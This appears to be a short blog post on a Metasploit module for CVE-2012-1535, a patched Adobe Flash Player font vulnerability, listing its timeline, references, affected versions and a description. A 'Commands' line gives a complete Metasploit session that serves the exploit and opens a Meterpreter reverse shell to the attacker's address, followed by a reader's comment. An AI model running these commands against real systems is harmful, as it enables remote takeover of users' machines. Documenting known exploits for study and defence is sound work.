Timeline :
Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17
PoC provided by :
Alexander Gavrun
juan vazquez
sinn3r
Reference(s) :
APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009
Affected version(s) :
Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.
Tested on Windows 7 Integral with :
Internet Explorer 9
Adobe Flash Player 11.3.300.268
Description :
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
Commands :
use exploit/windows/browser/adobe_flash_otf_font set SRVHOST 192.168.178.100 set ROP JRE set TARGET 6 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
Thanks for the share, great info! and the best part is that the exploit is already available in Backtrack 5 R3